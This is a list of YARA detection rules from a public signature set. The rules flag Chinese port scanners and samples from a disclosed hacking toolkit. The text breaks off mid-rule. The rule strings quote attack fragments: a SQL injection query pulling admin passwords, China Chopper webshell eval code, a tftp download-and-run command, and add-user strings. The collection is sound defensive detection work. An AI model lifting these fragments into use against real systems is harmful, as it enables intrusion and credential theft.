Detects a chinese Portscanner named MilkT - shipped BAT
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Hacktool_MilkT_BAT {
   meta:
      description = "Detects a chinese Portscanner named MilkT - shipped BAT"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      score = 70
      date = "12.10.2014"
      id = "d680a5f1-6182-5bc8-99de-c3cba1a61903"
   strings:
      $s0 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii
      $s1 = "if not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%" ascii
   condition:
      all of them
}
CN_Hacktool_MilkT_Scanner
Detects a chinese Portscanner named MilkT
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Hacktool_MilkT_Scanner {
   meta:
      description = "Detects a chinese Portscanner named MilkT"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      score = 60
      date = "12.10.2014"
      id = "aa83c983-25c2-5051-88a1-fbc70d947d6e"
   strings:
      $s0 = "Bf **************" ascii fullword
      $s1 = "forming Time: %d/" ascii
      $s2 = "KERNEL32.DLL" ascii fullword
      $s3 = "CRTDLL.DLL" ascii fullword
      $s4 = "WS2_32.DLL" ascii fullword
      $s5 = "GetProcAddress" ascii fullword
      $s6 = "atoi" ascii fullword
   condition:
      all of them
}
CN_Hacktool_SSPort_Portscanner
Detects a chinese Portscanner named SSPort
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Hacktool_SSPort_Portscanner {
   meta:
      description = "Detects a chinese Portscanner named SSPort"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      score = 70
      date = "12.10.2014"
      id = "38cc8830-efd3-51b7-8ac6-c9bf468212cb"
   strings:
      $s0 = "Golden Fox" fullword wide
      $s1 = "Syn Scan Port" fullword wide
      $s2 = "CZ88.NET" fullword wide
   condition:
      all of them
}
CN_Hacktool_S_EXE_Portscanner
Detects a chinese Portscanner named s.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Hacktool_S_EXE_Portscanner {
   meta:
      description = "Detects a chinese Portscanner named s.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      score = 70
      date = "12.10.2014"
      id = "d6b35d4f-7e25-50dd-bef2-08f7033312e8"
   strings:
      $s0 = "\\Result.txt" ascii
      $s1 = "By:ZT QQ:376789051" fullword ascii
      $s2 = "(http://www.eyuyan.com)" fullword wide
   condition:
      all of them
}
CN_Hacktool_ScanPort_Portscanner
Detects a chinese Portscanner named ScanPort
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Hacktool_ScanPort_Portscanner {
   meta:
      description = "Detects a chinese Portscanner named ScanPort"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      score = 70
      date = "12.10.2014"
      id = "a708283e-339c-599f-9321-3b063d0076a9"
   strings:
      $s0 = "LScanPort" fullword wide
      $s1 = "LScanPort Microsoft" fullword wide
      $s2 = "www.yupsoft.com" fullword wide
   condition:
      all of them
}
Sample from CN Honker Pentest Toolset - file ACCESS_brute.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_ACCESS_brute {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file ACCESS_brute.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "f552e05facbeb21cb12f23c34bb1881c43e24c34"
      id = "7ceaea93-4f23-50a3-ab39-8149b10ffdad"
   strings:
      $s1 = ".dns166.co" ascii /* PEStudio Blacklist: strings */
      $s2 = "SExecuteA" ascii /* PEStudio Blacklist: strings */
      $s3 = "ality/clsCom" ascii
      $s4 = "NT_SINK_AddRef" ascii
      $s5 = "WINDOWS\\Syswm" ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 20KB and all of them
}
Sample from CN Honker Pentest Toolset - file wshell.txt
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_ASP_wshell {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file wshell.txt"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "3ae33c835e7ea6d9df74fe99fcf1e2fb9490c978"
      id = "028136cd-129b-5d58-a4c2-ba730a798c06"
   strings:
      $s0 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii /* PEStudio Blacklist: strings */
      $s1 = "UserPass="
      $s2 = "VerName="
      $s3 = "StateName="
   condition:
      uint16(0) == 0x253c and filesize < 200KB and all of them
}
Script from disclosed CN Honker Pentest Toolset - file D.ASP
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_Alien_D {
   meta:
      description = "Script from disclosed CN Honker Pentest Toolset - file D.ASP"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "de9cd4bd72b1384b182d58621f51815a77a5f07d"
      id = "88529577-0dea-5aa8-b763-79a69397ddd5"
   strings:
      $s0 = "Paths_str=\"c:\\windows\\\"&chr(13)&chr(10)&\"c:\\Documents and Settings\\\"&chr" ascii /* PEStudio Blacklist: strings */
      $s1 = "CONST_FSO=\"Script\"&\"ing.Fil\"&\"eSyst\"&\"emObject\"" fullword ascii /* PEStudio Blacklist: strings */
      $s2 = "Response.Write \"<form id='form1' name='form1' method='post' action=''>\"" fullword ascii /* PEStudio Blacklist: strings */
      $s3 = "set getAtt=FSO.GetFile(filepath)" fullword ascii
      $s4 = "Response.Write \"<input name='NoCheckTemp' type='checkbox' id='NoCheckTemp' chec" ascii
   condition:
      filesize < 30KB and 2 of them
}
Script from disclosed CN Honker Pentest Toolset - file command.txt
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_Alien_command {
   meta:
      description = "Script from disclosed CN Honker Pentest Toolset - file command.txt"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "5896b74158ef153d426fba76c2324cd9c261c709"
      id = "55dd10c9-f7dc-5ee2-a47d-dab8cc7b60e6"
   strings:
      $s0 = "for /d %i in (E:\\freehost\\*) do @echo %i" fullword ascii /* PEStudio Blacklist: strings */
      $s1 = "/c \"C:\\windows\\temp\\cscript\" C:\\windows\\temp\\iis.vbs" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      filesize < 8KB and all of them
}
Sample from CN Honker Pentest Toolset - file ee.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_Alien_ee {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file ee.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "15a7211154ee7aca29529bd5c2500e0d33d7f0b3"
      id = "03540f82-6662-55e3-97f8-38776271f08b"
   strings:
      $s1 = "GetIIS UserName and PassWord." fullword wide /* PEStudio Blacklist: strings */
      $s2 = "Read IIS ID For FreeHost." fullword wide /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 50KB and all of them
}
Sample from CN Honker Pentest Toolset - file iispwd.vbs
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_Alien_iispwd {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file iispwd.vbs"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "5d157a1b9644adbe0b28c37d4022d88a9f58cedb"
      id = "e561c548-c656-5528-a2a8-2798a59ac6bf"
   strings:
      $s0 = "set IIs=objservice.GetObject(\"IIsWebServer\",childObjectName)" fullword ascii /* PEStudio Blacklist: strings */
      $s1 = "wscript.echo \"from : http://www.xxx.com/\" &vbTab&vbCrLf" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      filesize < 3KB and all of them
}
Sample from CN Honker Pentest Toolset - file Arp EMP v1.0.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_Arp_EMP_v1_0 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file Arp EMP v1.0.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee"
      id = "03782e94-4fac-529f-b235-19cdb124d53b"
   strings:
      $s0 = "Arp EMP v1.0.exe" fullword wide
   condition:
      uint16(0) == 0x5a4d and filesize < 400KB and all of them
}
Sample from CN Honker Pentest Toolset - file AspxClient.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_AspxClient {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file AspxClient.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      modified = "2022-12-21"
      score = 70
      hash = "67569a89128f503a459eab3daa2032261507f2d2"
      id = "7e38365c-ffe5-5fcd-8bd6-948d255d6e10"
   strings:
      $s1 = "\\tools\\hashq\\hashq.exe" wide
      $s2 = "\\Release\\CnCerT.CCdoor.Client.pdb" ascii
      $s3 = "\\myshell.mdb" wide /* PEStudio Blacklist: strings */
      $s4 = "injectfile" fullword wide /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 1000KB and 3 of them
}
CN_Honker_Baidu_Extractor_Ver1_0
Sample from CN Honker Pentest Toolset - file Baidu_Extractor_Ver1.0.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_Baidu_Extractor_Ver1_0 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file Baidu_Extractor_Ver1.0.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "1899f979360e96245d31082e7e96ccedbdbe1413"
      id = "94f3c3d8-aa68-5589-b26f-42315634ff30"
   strings:
      $s3 = "\\Users\\Admin" wide /* PEStudio Blacklist: strings */
      $s11 = "soso.com" fullword wide
      $s12 = "baidu.com" fullword wide
      $s19 = "cmd /c ping " fullword wide /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 500KB and all of them
}
Sample from CN Honker Pentest Toolset - file CooKie.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_COOKIE_CooKie {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file CooKie.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "f7727160257e0e716e9f0cf9cdf9a87caa986cde"
      id = "5f85bb0f-6df2-512c-ba1a-8a74c1a55563"
   strings:
      $s4 = "-1 union select 1,username,password,4,5,6,7,8,9,10 from admin" fullword ascii /* PEStudio Blacklist: strings */
      $s5 = "CooKie.exe" fullword wide /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 360KB and all of them
}
Sample from CN Honker Pentest Toolset - file ChinaChopper.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_ChinaChopper {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file ChinaChopper.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "fa347fdb23ab0b8d0560a0d20c434549d78e99b5"
      id = "9f7fbaac-65b5-5162-87d1-96ccd9711adb"
   strings:
      $s1 = "$m=get_magic_quotes_gpc();$sid=$m?stripslashes($_POST[\"z1\"]):$_POST[\"z1\"];$u" wide /* PEStudio Blacklist: strings */
      $s3 = "SETP c:\\windows\\system32\\cmd.exe " fullword wide /* PEStudio Blacklist: strings */
      $s4 = "Ev al (\"Exe cute(\"\"On+Error+Resume+Next:%s:Response.Write(\"\"\"\"->|\"\"\"\"" wide /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them
}
CN_Honker_ChinaChopper_db
Script from disclosed CN Honker Pentest Toolset - file db.mdb
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_ChinaChopper_db {
   meta:
      description = "Script from disclosed CN Honker Pentest Toolset - file db.mdb"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "af79ff2689a6b7a90a5d3c0ebe709e42f2a15597"
      id = "1314e204-d3f5-5f0a-bb74-dc774fef3d3c"
   strings:
      $s1 = "http://www.maicaidao.com/server.phpcaidao" fullword wide /* PEStudio Blacklist: strings */
      $s2 = "<O>act=login</O>" fullword wide /* PEStudio Blacklist: strings */
      $s3 = "<H>localhost</H>" fullword wide /* PEStudio Blacklist: strings */
   condition:
      filesize < 340KB and 2 of them
}
Sample from CN Honker Pentest Toolset - file Churrasco.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_Churrasco {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file Churrasco.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "5a3c935d82a5ff0546eff51bb2ef21c88198f5b8"
      id = "58873cd6-0c9e-58a0-923a-aca8a1d42017"
   strings:
      $s0 = "HEAD9 /" ascii
      $s1 = "logic_er" fullword ascii
      $s6 = "proggam" fullword ascii
      $s16 = "DtcGetTransactionManagerExA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 12 times */
      $s17 = "GetUserNameA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 305 times */
      $s18 = "OLEAUT" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 1276KB and all of them
}
Sample from CN Honker Pentest Toolset - file CleanIISLog.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_CleanIISLog {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file CleanIISLog.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
      id = "3931ba63-faf5-5b44-879c-105cd2812712"
   strings:
      $s1 = "Usage: CleanIISLog <LogFile>|<.> <CleanIP>|<.>" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 200KB and all of them
}
CN_Honker_CnCerT_CCdoor_CMD
Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_CnCerT_CCdoor_CMD {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "1c6ed7d817fa8e6534a5fd36a94f4fc2f066c9cd"
      id = "ddd328a8-7ad8-5b26-9deb-3e5da801cd1b"
   strings:
      $s2 = "CnCerT.CCdoor.CMD.dll" fullword wide
      $s3 = "cmdpath" fullword ascii
      $s4 = "Get4Bytes" fullword ascii
      $s5 = "ExcuteCmd" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 22KB and all of them
}
CN_Honker_CnCerT_CCdoor_CMD_2
Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll2
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_CnCerT_CCdoor_CMD_2 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll2"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "7f3a6fb30845bf366e14fa21f7e05d71baa1215a"
      id = "2681a989-6504-5ac7-abc9-e6dad2a052c5"
   strings:
      $s0 = "cmd.dll" fullword wide
      $s1 = "cmdpath" fullword ascii
      $s2 = "Get4Bytes" fullword ascii
      $s3 = "ExcuteCmd" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 22KB and all of them
}
CN_Honker_Codeeer_Explorer
Sample from CN Honker Pentest Toolset - file Codeeer Explorer.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_Codeeer_Explorer {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file Codeeer Explorer.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "f32e05f3fefbaa2791dd750e4a3812581ce0f205"
      id = "d4a88ae7-c0b2-57d2-a070-3dd748a30a3a"
   strings:
      $s2 = "Codeeer Explorer.exe" fullword wide /* PEStudio Blacklist: strings */
      $s12 = "webBrowser1_ProgressChanged" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 470KB and all of them
}
Sample from CN Honker Pentest Toolset - file CookiesView.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_CookiesView {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file CookiesView.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "c54e1f16d79066edfa0f84e920ed1f4873958755"
      id = "71a43797-4b5b-5f87-a70e-ebabc00d9319"
   strings:
      $s0 = "V1.0 Http://www.darkst.com Code:New4" fullword ascii
      $s1 = "maotpo@126.com" fullword ascii
      $s2 = "www.baidu.com" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 640KB and all of them
}
Sample from CN Honker Pentest Toolset - file scan.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_CoolScan_scan {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file scan.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "e1c5fb6b9f4e92c4264c7bea7f5fba9a5335c328"
      id = "781446d2-3363-56c3-9767-c7ac70047b68"
   strings:
      $s0 = "User-agent:\\s{0,32}(huasai|huasai/1.0|\\*)" fullword ascii /* PEStudio Blacklist: strings */
      $s1 = "scan web.exe" fullword wide /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 3680KB and all of them
}
Sample from CN Honker Pentest Toolset - file SHELL.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_Cracker_SHELL {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file SHELL.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "c1dc349ff44a45712937a8a9518170da8d4ee656"
      id = "2249a058-7469-5054-9c51-cb20ef8197ca"
   strings:
      $s1 = "http://127.0.0.1/error1.asp" fullword ascii /* PEStudio Blacklist: strings */
      $s2 = "password,PASSWORD,pass,PASS,Lpass,lpass,Password" fullword wide /* PEStudio Blacklist: strings */
      $s3 = "\\SHELL" wide /* PEStudio Blacklist: strings */
      $s4 = "WebBrowser1" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 200KB and all of them
}
CN_Honker_DLL_passive_privilege_escalation_ws2help
Sample from CN Honker Pentest Toolset - file ws2help.dll
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_DLL_passive_privilege_escalation_ws2help {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file ws2help.dll"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "e539b799c18d519efae6343cff362dcfd8f57f69"
      id = "85a07bb7-2856-56f0-bd15-e020bb2a7692"
   strings:
      $s0 = "PassMinDll.dll" fullword ascii
      $s1 = "\\ws2help.dll" ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 30KB and all of them
}
CN_Honker_D_injection_V2_32
Sample from CN Honker Pentest Toolset - file D_injection_V2.32.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_D_injection_V2_32 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file D_injection_V2.32.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "3a000b976c79585f62f40f7999ef9bdd326a9513"
      id = "4c661c35-61ee-5ee7-9b8e-9908fbe0362b"
   strings:
      $s0 = "Missing %s property(CommandText does not return a result set{Error creating obje" wide /* PEStudio Blacklist: strings */
      $s1 = "/tftp -i 219.134.46.245 get 9493.exe c:\\9394.exe" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 5000KB and all of them
}
CN_Honker_DictionaryGenerator
Sample from CN Honker Pentest Toolset - file DictionaryGenerator.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_DictionaryGenerator {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file DictionaryGenerator.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "b3071c64953e97eeb2ca6796fab302d8a77d27bc"
      id = "29ce6f8c-3092-5917-ab31-aaed7834c500"
   strings:
      $s1 = "`PasswordBuilder" fullword ascii /* PEStudio Blacklist: strings */
      $s2 = "cracker" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 3650KB and all of them
}
CN_Honker_F4ck_Team_BlackMoon_Jun15
Sample from CN Honker Pentest Toolset - file f4ck.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_F4ck_Team_BlackMoon_Jun15 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file f4ck.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      old_rule_name = "CN_Honker_F4ck_Team_f4ck_3"
      date = "2015-06-23"
      score = 70
      hash = "7e3bf9b26df08cfa10f10e2283c6f21f5a3a0014"
      id = "df12daca-8e03-5382-b71d-96a747d3a043"
   strings:
      $s1 = "File UserName PassWord [comment] /add" fullword ascii /* PEStudio Blacklist: strings */
      $s2 = "No Net.exe Add User" fullword ascii
      $s3 = "BlackMoon RunTime Error:" fullword ascii
      $s4 = "Team.F4ck.Net" fullword wide
      $s5 = "admin 123456789" fullword ascii /* PEStudio Blacklist: strings */
      $s6 = "blackmoon" fullword ascii
      $s7 = "f4ck Team" fullword wide
   condition:
      uint16(0) == 0x5a4d and filesize < 100KB and 4 of them
}
CN_Honker_F4ck_Team_F4ck_3
Sample from CN Honker Pentest Toolset - file F4ck_3.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_F4ck_Team_F4ck_3 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file F4ck_3.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "0b3e9381930f02e170e484f12233bbeb556f3731"
      id = "1767669f-47d0-5d6e-97a5-92522f988102"
   strings:
      $s1 = "F4ck.exe" fullword wide
      $s2 = "@Netapi32.dll" fullword ascii
      $s3 = "Team.F4ck.Net" fullword wide
      $s6 = "NO Net Add User" fullword wide
      $s7 = "DLL ERROR" fullword ascii
      $s11 = "F4ck Team" fullword wide
   condition:
      uint16(0) == 0x5a4d and filesize < 100KB and 3 of them
}
Script from disclosed CN Honker Pentest Toolset - file f4ck.txt
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_F4ck_Team_f4ck {
   meta:
      description = "Script from disclosed CN Honker Pentest Toolset - file f4ck.txt"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "e216f4ba3a07de5cdbb12acc038cd8156618759e"
      id = "abf2f277-79b4-5ca2-b12e-93a662e5d607"
   strings:
      $s0 = "PassWord:F4ckTeam!@#" fullword ascii /* PEStudio Blacklist: strings */
      $s1 = "UserName:F4ck" fullword ascii /* PEStudio Blacklist: strings */
      $s2 = "F4ck Team" fullword ascii
   condition:
      filesize < 1KB and all of them
}
CN_Honker_F4ck_Team_f4ck_2
Sample from CN Honker Pentest Toolset - file f4ck_2.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_F4ck_Team_f4ck_2 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file f4ck_2.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "0783661077312753802bd64bf5d35c4666ad0a82"
      id = "b2a9067f-57d0-5b32-87c8-3b635c3944a5"
   strings:
      $s1 = "F4ck.exe" fullword wide
      $s2 = "@Netapi32.dll" fullword ascii
      $s3 = "Team.F4ck.Net" fullword wide
      $s8 = "Administrators" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 14 times */
      $s9 = "F4ck Team" fullword wide
   condition:
      uint16(0) == 0x5a4d and filesize < 220KB and 2 of them
}
Sample from CN Honker Pentest Toolset - file FTP_scanning.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_FTP_scanning {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file FTP_scanning.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "5a3543ee5aed110c87cbc3973686e785bcb5c44e"
      id = "828a0dc8-3748-5c07-a767-4f9e85968ca1"
   strings:
      $s1 = "CNotSupportedE" fullword ascii /* PEStudio Blacklist: strings */
      $s2 = "nINet.dll" fullword ascii
      $s9 = "?=MODULE" fullword ascii /* PEStudio Blacklist: strings */
      $s13 = "MSIE 6*" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 550KB and all of them
}
Sample from CN Honker Pentest Toolset - file Fckeditor.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_Fckeditor {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file Fckeditor.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "4b16ae12c204f64265acef872526b27111b68820"
      id = "eb8767cb-b081-5c37-b7ad-57a0de047462"
   strings:
      $s0 = "explorer.exe http://user.qzone.qq.com/568148075" fullword wide /* PEStudio Blacklist: strings */
      $s7 = "Fckeditor.exe" fullword wide /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 1340KB and all of them
}
Sample from CN Honker Pentest Toolset - file FPipe.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_Fpipe_FPipe {
   meta:
